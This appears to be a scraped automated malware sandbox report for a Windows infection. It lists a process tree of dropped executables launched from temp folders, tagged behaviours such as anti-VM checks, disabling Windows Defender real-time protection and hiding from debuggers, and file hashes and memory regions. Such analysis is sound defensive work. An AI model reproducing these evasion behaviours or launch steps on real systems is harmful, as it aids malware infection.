                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2264 /prefetch:2
                                        5⤵
                                          PID:5672
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3368 /prefetch:2
                                          5⤵
                                            PID:5704
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1976 /prefetch:2
                                            5⤵
                                              PID:5720
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4508 /prefetch:2
                                              5⤵
                                                PID:5744
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3096 /prefetch:2
                                                5⤵
                                                  PID:5764
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15467607810540298429,15493078261132162689,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4528 /prefetch:2
                                                  5⤵
                                                    PID:5780
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\KJKFBAFIDA.exe"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5456
                                                  • C:\Users\Admin\Documents\KJKFBAFIDA.exe
                                                    "C:\Users\Admin\Documents\KJKFBAFIDA.exe"
                                                    5⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5356
                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u423W.exe
                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u423W.exe
                                              2⤵
                                              • Modifies Windows Defender Real-time Protection settings
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Windows security modification
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5624
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3804 -ip 3804
                                            1⤵
                                              PID:1136
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1896 -ip 1896
                                              1⤵
                                                PID:2880
                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                1⤵
                                                  PID:2916
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                  1⤵
                                                    PID:3336
                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5960
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3968 -ip 3968
                                                    1⤵
                                                      PID:624
                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      1⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5368

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\ProgramData\mozglue.dll

                                                      Filesize

                                                      593KB

                                                      MD5

                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                      SHA1

                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                      SHA256

                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                      SHA512

                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                    • C:\ProgramData\nss3.dll

                                                      Filesize

                                                      2.0MB

                                                      MD5

                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                      SHA1

                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                      SHA256

                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                      SHA512

                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                      Filesize

                                                      649B

                                                      MD5

                                                      6e7c5766f810eabac490b88bb86103f9

                                                      SHA1

                                                      c89034d662948dfdd24549dad8c648ce3179fdfd

                                                      SHA256

                                                      f30dfce0396fcdb2e000c16affcfd88c012c6ffb2a465b61628e86dab6de9565

                                                      SHA512

                                                      8c3e4597b91e46ff050c987af90bebabfc41e7f10d871603a1eea146689eb52b527c77802b78a95860c8f635d79d71a4a89dde3476fcc3e775963e359c9d0136

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

                                                      Filesize

                                                      851B

                                                      MD5

                                                      07ffbe5f24ca348723ff8c6c488abfb8

                                                      SHA1

                                                      6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                      SHA256

                                                      6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                      SHA512

                                                      7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

                                                      Filesize

                                                      854B

                                                      MD5

                                                      4ec1df2da46182103d2ffc3b92d20ca5

                                                      SHA1

                                                      fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                      SHA256

                                                      6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                      SHA512

                                                      939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                      Filesize

                                                      2B

                                                      MD5

                                                      d751713988987e9331980363e24189ce

                                                      SHA1

                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                      SHA256

                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                      SHA512

                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9885627a-a317-4e13-afbf-4780753b5e89.dmp

                                                      Filesize

                                                      10.4MB

                                                      MD5

                                                      315cec4796f576b831a6c8f3f53b458a

                                                      SHA1

                                                      36efcff4ec1258b72729d87bf2d4846a8b879ef1

                                                      SHA256

                                                      37559a8ff48339fe4d7c50ae8e31ca628fc3bcd02e977483fdc09e68ba352cbf

                                                      SHA512

                                                      cddb2eadd9cfda0f6c97080d5579acf2eb1f2c4b183d4c9e6cf55d68d1ba14d97aafd6af9e0206be9bfdbad699af012d7c98d29bb6f027fe02caea1f7995629f

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      7de1bbdc1f9cf1a58ae1de4951ce8cb9

                                                      SHA1

                                                      010da169e15457c25bd80ef02d76a940c1210301

                                                      SHA256

                                                      6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

                                                      SHA512

                                                      e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      85ba073d7015b6ce7da19235a275f6da

                                                      SHA1

                                                      a23c8c2125e45a0788bac14423ae1f3eab92cf00

                                                      SHA256

                                                      5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

                                                      SHA512

                                                      eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      0645d01f75ac760dd7440357e3b2f28d

                                                      SHA1

                                                      c15cf1592891bef09d0613b133f46d40b147b5e0

                                                      SHA256

                                                      e19c8261aa5e339e792b4e462d4afafd9cac7777f7711266f59bccecf2a78ad4

                                                      SHA512

                                                      46856812320aff9d70d66c0b2140de626e584ad171f15637d2eb9f0201d8592af23d38c8adb48b3a150f035b04e629be4f02a2d19c3fa69dedbcda681578855c

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bd6a9979-7e8e-49c6-8297-7245cfee2368.tmp

                                                      Filesize

                                                      1B

                                                      MD5

                                                      5058f1af8388633f609cadb75a75dc9d

                                                      SHA1

                                                      3a52ce780950d4d969792a2559cd519d7ee8c727

                                                      SHA256

                                                      cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                      SHA512

                                                      0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                      Filesize

                                                      264KB

                                                      MD5

                                                      f50f89a0a91564d0b8a211f8921aa7de

                                                      SHA1

                                                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                      SHA256

                                                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                      SHA512

                                                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\L6PPXFHA\download[1].htm

                                                      Filesize

                                                      1B

                                                      MD5

                                                      cfcd208495d565ef66e7dff9f98764da

                                                      SHA1

                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                      SHA256

                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                      SHA512

                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                    • C:\Users\Admin\AppData\Local\Temp\1013967001\jd5fvXs.exe

                                                      Filesize

                                                      382KB

                                                      MD5

                                                      83b8507f0961cc5fd4a39d1def4dad1c

                                                      SHA1

                                                      7f97044ffbc10454d94fc6db868ae4071f7a5d46

                                                      SHA256

                                                      d8405be5cc0b5273433b62e2af31c18fa688fd5f0d2e11f8ff41a064fa917a09

                                                      SHA512

                                                      f5c65cd2590f971e2076b7687e60253ae333b85a882ad089fa3a097fdf9bbab9e359b4f2b6e0f18f36fd64dc905a89aca41a15b82752c8a4357f121f331e99f9

                                                    • C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      ac1f270bd43a0c8717ae8defeec9aa56

                                                      SHA1

                                                      d5cf700b8c5fbed732d0a7ddc2e220445e37e422

                                                      SHA256

                                                      c3a4921613eba9ac79a2aca73843c28d1894f17ef49a451540f4b6f40f9f12db

                                                      SHA512

                                                      5afbc7252116384444d24c566f6a75aaf6de0aa142547b8063a04997a28fd0ae996558da5e16789170c702aaaca4d032e9939628ffa62fb3dd9129c96b91c9e6

                                                    • C:\Users\Admin\AppData\Local\Temp\1014060001\ce0d1061c5.exe

                                                      Filesize

                                                      710KB

                                                      MD5

                                                      28e568616a7b792cac1726deb77d9039

                                                      SHA1

                                                      39890a418fb391b823ed5084533e2e24dff021e1

                                                      SHA256

                                                      9597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2

                                                      SHA512

                                                      85048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5

                                                    • C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe

                                                      Filesize

                                                      898KB

                                                      MD5

                                                      5950611ed70f90b758610609e2aee8e6

                                                      SHA1

                                                      798588341c108850c79da309be33495faf2f3246

                                                      SHA256

                                                      5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4

                                                      SHA512

                                                      7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

                                                    • C:\Users\Admin\AppData\Local\Temp\1014152001\a463830ef8.exe

                                                      Filesize

                                                      2.5MB

                                                      MD5

                                                      2a78ce9f3872f5e591d643459cabe476

                                                      SHA1

                                                      9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                                                      SHA256

                                                      21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                                                      SHA512

                                                      03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                                                    • C:\Users\Admin\AppData\Local\Temp\1014153001\d9bee0ff85.exe

                                                      Filesize

                                                      1.9MB

                                                      MD5

                                                      eefb2f1c192c97102fde4cf5e052045f

                                                      SHA1

                                                      0f46805429b14dffb3e9847d2de1df1690c780cf

                                                      SHA256

                                                      ddeffe837a2afab5ef15a20f517d6bf71f9d0f805217d1777e664c321e5a6560

                                                      SHA512

                                                      6041c9d4a566a22b743bcceba656f0c0d7a83482745ea3e7838c522f1c053c017b1f04b5c0f0f5b9f83d0f37816a04228d4edfc2f339e4f97c30a13fb7c6231e

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u423W.exe

                                                      Filesize

                                                      2.6MB

                                                      MD5

                                                      dc5bc268caccf12fd6319ef3c9a10a51

                                                      SHA1

                                                      1f2e3d96fbc4a671d241bd98df292c399d2065d3

                                                      SHA256

                                                      f1644ce2dd236f32130a064d94b4e7bef23869d1431f9aedfb7744dd1032a3c0

                                                      SHA512

                                                      36fa488d0fb1ae07aa2928a69c2dd9b6c521c50b3ee6eed17f516daeafdd66d9b831caae19a3e6be981e6c249e7f4ad8b3338920b8b6761ae07265272596b8d4

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\V2M11.exe

                                                      Filesize

                                                      5.3MB

                                                      MD5

                                                      2b93fa2438e6542b5a869155f8bd38e7

                                                      SHA1

                                                      eb64c777e068131b74ae0b5975d19006673285d3

                                                      SHA256

                                                      12bec1dcb0b016c733112d3300deb01b897fdb9606afa51e79235579e4902b37

                                                      SHA512

                                                      b8006de82fc15e420be2d4cbd74736a40933a5e9c12a157a2dcba24e208cd5427bb72a007d36ba82f6c00be1d318b75cedfc27eca12bb13b05a8ea563e6565ed

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3D67o.exe

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      fa6302cad860b483cf09dd5ee21e4375

                                                      SHA1

                                                      face1557a87762dc2b2b61fdfa42062de45ba58f

                                                      SHA256

                                                      740ee8290b41757d741b191a4b0e138bca238245eedc57e39a7f528b19b7bae4

                                                      SHA512

                                                      d3e2637753b316c58ff1afa670311188ecc08a0313d1fa4ab35e5f8e95911d442ec75ac648b1dc9d56806c9e092ad9038da3c0861a004a01909b956f3d0fc362

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\f5o42.exe

                                                      Filesize

                                                      3.5MB

                                                      MD5

                                                      bd0645f236e05d7facb6b27935a996cd

                                                      SHA1

                                                      e04a4ead69615aa057f10fa5f30d1faf86dfc5b0

                                                      SHA256

                                                      fe61fc6cebdef847fb7c3a0d6e1352f41506f1d5498d10e0453bd75e36ba63bf

                                                      SHA512

                                                      cbb476d8736e8c762131ce963e4f9bfc4d35d91b72e68b207f2ef0310bdbe5fe2b7a8400cbc54b49133aa504db27c74a9a456caba20a9d9b0746d0269a709968

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1I15b7.exe

                                                      Filesize

                                                      3.0MB

                                                      MD5

                                                      6ced085779b2d439cab6d085699b195a

                                                      SHA1

                                                      ad384d731162250141ef02196ebb970dd89adbe9

                                                      SHA256

                                                      23a363810e5d66c620d5069ab26eb4625e899cbb2bf4d49978e1582ae100d5eb

                                                      SHA512

                                                      5d100d0aec0088e9535d842199e3cef498b4449b2c7e09c44f36d2a874c798e33802d014a70f06b76aa5617441c1b59bf66d02688244d27b4b62c9f6bf7515e3

                                                    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2o0784.exe

                                                      Filesize

                                                      1.8MB

                                                      MD5

                                                      b9741880b8829c49e255ac4e183bfb0a

                                                      SHA1

                                                      d6e9cfa868d353ba40e1b0b96e27b3af132a3901

                                                      SHA256

                                                      15c935de956f2da0317c7d29668f1192a5c74ba930c2f272dcc1182a7c105d67

                                                      SHA512

                                                      47025c7eac43f715af02bb6392e9289d0bac57729eac7f5719ef08ec4e71be96fe1d1746152cd0d602270ea47d2a31b47933bb3f8c9fc23f11c1b8ba8f791536

                                                    • C:\Users\Admin\AppData\Local\Temp\scoped_dir2712_222231705\1e090d5c-f463-4edd-9753-d0e235c8cec4.tmp

                                                      Filesize

                                                      135KB

                                                      MD5

                                                      3f6f93c3dccd4a91c4eb25c7f6feb1c1

                                                      SHA1

                                                      9b73f46adfa1f4464929b408407e73d4535c6827

                                                      SHA256

                                                      19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e

                                                      SHA512

                                                      d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4

                                                    • C:\Users\Admin\AppData\Local\Temp\scoped_dir2712_222231705\CRX_INSTALL\_locales\en_CA\messages.json

                                                      Filesize

                                                      711B

                                                      MD5

                                                      558659936250e03cc14b60ebf648aa09

                                                      SHA1

                                                      32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

                                                      SHA256

                                                      2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

                                                      SHA512

                                                      1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

                                                    • C:\Users\Admin\AppData\Local\Temp\tmp.bat

                                                      Filesize

                                                      2B

                                                      MD5

                                                      81051bcc2cf1bedf378224b0a93e2877

                                                      SHA1

                                                      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

                                                      SHA256

                                                      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

                                                      SHA512

                                                      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

                                                    • C:\Users\Admin\AppData\Local\Temp\tmp.ini

                                                      Filesize

                                                      34B

                                                      MD5

                                                      557464a645cbcc72fb20348e1c58dbfd

                                                      SHA1

                                                      2a68b1e4c9cca06c959a3174058a27da0faddadd

                                                      SHA256

                                                      2fb99e1172ec47d7d0a943294a483e9c695d774ad9eca0c689eb0e4ad4982c66

                                                      SHA512

                                                      728fba91e931258ed5ad1ff48299193384c0053770e05c0f813e8407dd328454c2c233da52ea67eb5aaf1c523a8d0e5de5a30b9bc94186e62c204b26df23123e

                                                    • C:\Users\Admin\AppData\Local\Temp\tmp.txt

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      d21f58f9520be3c5a1dce5b410df4809

                                                      SHA1

                                                      52e414e1372cdac7b350e2435b0aff4d18fb2fd2

                                                      SHA256

                                                      7bdb42e287ff7719467838cd659947bcb3b742a2f6bf2244e4e77911014d8df2

                                                      SHA512

                                                      9b719a5a4a1057383208ffece991ee3d5b0c51a94ac01dbc69e655441193d83e91879f598c3ba0437af1cf3606e11aa5f3c6b13835be9791d637c57ef193e1c9

                                                    • C:\Users\Admin\Documents\KJKFBAFIDA.exe

                                                      Filesize

                                                      3.1MB

                                                      MD5

                                                      1d76809da336506c7804667df1793d1f

                                                      SHA1

                                                      fb13b1d578f0c0455d37026e68922b4affbbd122

                                                      SHA256

                                                      662dd88031f30391ca27bbc73a0730b99b7f2c3f8079f21149f1d73c4753bd41

                                                      SHA512

                                                      69d6f383e8f0c3f20e3fc4fded53170791ea18b3faf13dc6bef52ae0a47e1bd461fa018b754378dbd89d35aec6155ac1951c5325ed194a6cb3f7a1378b46304c

                                                    • memory/1844-21-0x00000000004A0000-0x00000000007AE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/1844-34-0x00000000004A0000-0x00000000007AE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/1896-107-0x00000000094C0000-0x0000000009A64000-memory.dmp

                                                      Filesize

                                                      5.6MB

                                                    • memory/1896-81-0x0000000000440000-0x000000000089E000-memory.dmp

                                                      Filesize

                                                      4.4MB

                                                    • memory/1896-80-0x0000000000440000-0x000000000089E000-memory.dmp

                                                      Filesize

                                                      4.4MB

                                                    • memory/1896-135-0x0000000000440000-0x000000000089E000-memory.dmp

                                                      Filesize

                                                      4.4MB

                                                    • memory/1896-82-0x0000000000440000-0x000000000089E000-memory.dmp

                                                      Filesize

                                                      4.4MB

                                                    • memory/1896-86-0x00000000078A0000-0x0000000007932000-memory.dmp

                                                      Filesize

                                                      584KB

                                                    • memory/1896-87-0x0000000009450000-0x00000000094B6000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/2520-849-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-852-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-853-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-827-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-850-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-851-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-79-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-35-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-843-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-83-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-797-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-707-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-200-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-844-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-842-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2520-845-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/2576-85-0x00000000001D0000-0x000000000067D000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                    • memory/2576-105-0x00000000001D0000-0x000000000067D000-memory.dmp

                                                      Filesize

                                                      4.7MB

